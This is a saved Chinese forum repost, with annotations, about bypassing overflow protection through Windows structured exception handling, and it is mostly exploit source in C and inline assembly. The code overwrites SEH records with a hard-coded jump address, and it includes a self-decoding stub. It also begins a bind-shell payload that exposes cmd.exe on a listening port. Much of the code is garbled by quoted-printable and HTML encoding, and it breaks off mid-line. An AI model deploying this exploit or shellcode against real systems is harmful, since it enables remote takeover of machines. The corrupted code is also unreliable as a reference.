📄 [转帖+注释]利用结构异常绕过溢出保护攻击.mht

                           =
  temp=shellcodebuff[i];
                        &nbsp;&nbsp;=20
                        =
&nbsp;if(temp&lt;=3D0x10||temp=3D=3D'0'){<BR>/*&nbsp; &nbsp;=20
                        =
  Encode the bytes of the shellcodefn function and copy them into buf.
  Encoding rule (the loop above): any byte <= 0x10, and the byte '0' (0x30) itself, is
  emitted as the escape byte '0' followed by (byte + 0x40); every other byte is copied as is.
  shellcodefnlock reverses this in place at run time.
  After this step buf is laid out as:
[NNNNNNNN][NNNN][shellcodefnlock][port][str][shellcodefn][NNNN]
 32 NOPs   4 NOPs
                        &nbsp; <BR>&nbsp; &nbsp; */<BR><BR>&nbsp; &nbsp; =

                        buff[OVERADD+NOPLONG+k]=3D'0';<BR>&nbsp; &nbsp;=20
                        ++k;<BR>&nbsp; &nbsp; temp+=3D0x40;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;}<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;buff[OVERADD+NOPLONG+k]=3Dtemp;<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;++k;<BR>}<BR><BR>&nbsp;&nbsp;<BR>for(i=3D-0x30;i&lt;0x20;i+=3D8){<B=
R>&nbsp;=20
                        &nbsp;=20
                        =
memcpy(buff+OVERADD2+i,JMPNEXTJMP,4);
/*
  Overwrite the "next" link of the exception registration record (the SEH chain pointer).
  When the exception fires, ebx points here.  This differs from an ordinary stack overflow,
  where ESP ends up near the overflowed buffer: at the moment the exception is raised ESP is
  NOT near this buffer, so a jmp-esp style return would not land here.
*/
                        =
  memcpy(buff+OVERADD2+i+4,eipwinnt,4);
/*
  Overwrite the handler pointer of the exception registration record.
  When the exception fires, execution is transferred to this pointer.
  What is written here is the address of a `jmp ebx` instruction (eipwinnt is a hard-coded
  absolute address -- see the bytes in the layout below -- so it is specific to one build of
  the target).
*/
}
/*
  Overwrite repeatedly (the loop spans OVERADD2-0x30 .. OVERADD2+0x18 in 8-byte steps, one
  4+4-byte record per step) to raise the odds that one copy lands exactly on the live
  exception registration record.
*/
memcpy(buff+OVERADD2+8,JMPSHELL,5);
/*
  The jump into the shellcode: a long (rel32) jump.  Note that it is written at OVERADD2+8,
  i.e. over the start of the record the loop wrote at i=8.
*/
  sendpacketlong=0x1000-0x10;

/* The final buf (as sent) is:
   (the original diagram carried column markers "esp", "ret" and "0xf88h^" pointing into the
    tail of the buffer; their exact alignment was lost when the post was saved)

[NNNNNNNN][NNNN][shellcodefnlock][port][str][shellcodefn][NNNNNNNNNNN][\x90\x90\x90\x2d\x63\x0d\xfa\x7f][\xe9\x40\xf0\xff\xff]
 32 NOPs   4 NOPs                                          10 NOPs      next link | handler          jmp rel32
                                                           (counts as annotated in the original post)

  Reading the bytes shown: the 8-byte group is one exception registration record as written by
  the loop above -- 4 bytes for the "next" link, 4 bytes (0x7ffa0d63, little-endian) for the
  handler.  0x2d is the opcode of `sub eax, imm32`, so once `jmp ebx` lands on the "next" field
  the CPU executes nop, nop, nop, then consumes the four handler-address bytes as the immediate
  of that sub instead of executing them, and falls straight into the 5-byte
  `\xe9 \x40\xf0\xff\xff` = `jmp rel32` with displacement 0xfffff040 (-0xfc0).  That jumps back
  toward the front of the packet, presumably into the NOP run ahead of shellcodefnlock -- the
  exact landing spot depends on OVERADD/OVERADD2, which are not shown here.  Because the handler
  address is hard-coded, this only works on a build where a `jmp ebx` really sits at 0x7ffa0d63.
*/
  for(i=0;i<1;++i){
                        <BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;j=3Dsendpacketlong;<BR>&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;fprintf(stderr,"\n=20
                        send&nbsp;&nbsp;packet %d bytes.",j);<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;send(fd,buff,j,0);<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;k=3Drecv(fd,recvbuff,0x1000,0);<BR>&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;if(k&gt;0){<BR>&nbsp;=20
                        &nbsp; recvbuff[k]=3D0;<BR>&nbsp; &nbsp;=20
                        fprintf(stderr,"\n&nbsp;&nbsp;recv:\n=20
                        %s",recvbuff);<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;}<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;closesocket(fd);<BR>&=
nbsp;&nbsp;WSACleanup(=20
                        =
);<BR>&nbsp;&nbsp;return(0);<BR>}<BR>&nbsp;&nbsp;<BR><BR>void&nbsp;&nbsp;=
shellcodefnlock()
{
    /*
     * Self-decoding stub placed in the packet ahead of the real payload (shellcodefn).
     *
     * main() escapes every payload byte that is <= 0x10, and the byte '0' (0x30) itself,
     * as the two-byte sequence '0', (byte + 0x40).  This stub reverses that in place,
     * starting at its own "shell" label, and then continues execution at "shell", i.e.
     * into the decoded bytes that follow (in the packet layout: [port][str][shellcodefn];
     * how the port/str bytes are stepped over is not visible in this listing).
     *
     * Registers: EDI/ESI = write/read cursor, ECX = output byte counter; all three are
     * clobbered, as are AL and the flags.
     *
     * NOTE(review): the stub's own machine code contains 0x0F (in `mov cx,0x0fd0`,
     * encoded 66 B9 D0 0F) and 0x30 (in `cmp al,0x30`, encoded 3C 30) -- exactly the
     * byte values the encoder avoids in shellcodefn.  So the stub must be sent unencoded
     * and those bytes tolerated where it sits; confirm against the target's real filter.
     *
     * NOTE(review): the decode count (0x0fd0 output bytes) is fixed rather than derived
     * from the payload length, so decoding runs on past the end of shellcodefn and
     * rewrites whatever memory follows, shifted down by the number of escape pairs
     * consumed so far -- TODO confirm that region is writable and nothing there is
     * still needed.
     */
    _asm
{
        /* Original comment: "NOP string used to locate the short assembly sequence
           below".  Presumably also the landing pad for the back-jump at the end of
           the buffer -- depends on OVERADD/OVERADD2, not shown here. */
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        /* Position-independent "get PC": jump forward to a call whose pushed return
           address is &shell, then pop that address. */
        jmp  next
getediadd:
        pop   EDI                 /* EDI = &shell (the return address pushed by the call) */
        push  EDI
        pop   ESI                 /* ESI = EDI: decode in place, same read and write start */
        xor   ecx,ecx
        mov   cx,0x0fd0           /* number of OUTPUT bytes to produce (4048) */
looplock:
        lodsb                     /* al = *ESI++ */
        cmp   al,0x30             /* '0' is the escape byte chosen by the encoder in main() */
        jnz   sto
        lodsb                     /* escaped: take the following byte ... */
        sub   al,0x40             /* ... and undo the +0x40 the encoder added */
sto:
        stosb                     /* *EDI++ = al.  EDI never overtakes ESI: each step reads
                                     one or two bytes and writes exactly one. */
        loop  looplock            /* loop decrements ECX without touching the flags */
        jmp   shell
next:
        call  getediadd           /* pushes &shell as return address; getediadd pops it */
        /* Original comment: "decode shellcode" */
shell:  NOP                       /* decoding starts here and runs forward from this point */
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP

}
}

/* The shellcode proper, i.e. the part that does the real work. */
/* This shellcode opens a listening port and binds cmd.exe to it. */
void
                        shellcodefn()<BR>{ char&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;Buff[0x800];<BR>int&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;*except[3];<BR><BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;closesocketadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;ioctlsocketadd;<BR>FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;recvadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;sendadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;acceptadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;listenadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;bindadd;<BR>&nbsp; =
&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;socketadd;<BR>/*&nbsp;=20
                        &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;WSAStartupadd;&nbsp;&nbsp;*/<BR><BR>FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;NOPNOP;<BR><BR>FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;WriteFileadd;<BR>FARPROC&nbsp; =

                        &nbsp;&nbsp;&nbsp;ReadFileadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;PeekNamedPipeadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;CloseHandleadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;CreateProcessadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;CreatePipeadd;<BR>FARPROC&nbsp;&nbsp;procloadlib;<BR><B=
R>FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;apifnadd[1];<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;procgetadd=3D0;<BR><BR>char&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;*stradd;<BR>int&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;imgbase,fnbase,k,l;<BR>HANDLE&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;libhandle;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;STARTUPINFO siinfo;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;SOCKET&nbsp;=20
                        &nbsp;&nbsp; &nbsp;listenFD,clientFD;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;struct&nbsp;=20
                        &nbsp;&nbsp; &nbsp;sockaddr_in server;<BR>&nbsp; =

                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;int&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;iAddrSize =3D=20
                        sizeof(server);<BR>int&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;lBytesRead;<BR>u_short&nbsp;=20
                        &nbsp;&nbsp;&nbsp;shellcodeport;<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;PROCESS_INFORMATION=20
                        ProcessInformation;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;HANDLE&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;SECURITY_ATTRIBUTES =
sa;<BR>_asm=20
                        {&nbsp; &nbsp;&nbsp;&nbsp;jmp&nbsp; &nbsp;=20
                        nextcall<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;getstradd:&nbsp; &nbsp;pop&nbsp; &nbsp;=20
                        stradd<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; =
lea&nbsp;=20
                        &nbsp; EDI,except<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp; eax,dword ptr =
FS:[0]<BR>&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp; dword ptr =
[edi+0x08],eax<BR>&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp; dword ptr FS:[0],EDI<BR><BR>}<BR>&nbsp; =
&nbsp;=20
                        except[0]=3D0xffffffff;<BR>&nbsp; &nbsp;=20
                        except[1]=3Dstradd-0x07;<BR><BR>&nbsp; &nbsp;=20
                        imgbase=3D0x77e00000;<BR>&nbsp; &nbsp; =
_asm{<BR>&nbsp;=20
                        &nbsp; call getexceptretadd<BR>&nbsp; &nbsp;=20
                        =
}
for(;imgbase<0xbffa0000,procgetadd==0;){
                        &nbsp;&nbsp;&nbsp;imgbase+=3D0x10000;<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;if(imgbase=3D=3D0x78000000)=20
                        imgbase=3D0xbff00000;<BR>&nbsp; =
&nbsp;&nbsp;&nbsp;if(*(=20
                        WORD *)imgbase=3D=3D'ZM'&amp;&amp; *(WORD=20
                        =
*)(imgbase+*(int<BR>*)(imgbase+0x3c))=3D=3D'EP'){<BR>fnbase=3D*(int=20
                        *)(imgbase+*(int=20
                        *)(imgbase+0x3c)+0x78)+imgbase;<BR>k=3D*(int=20
       
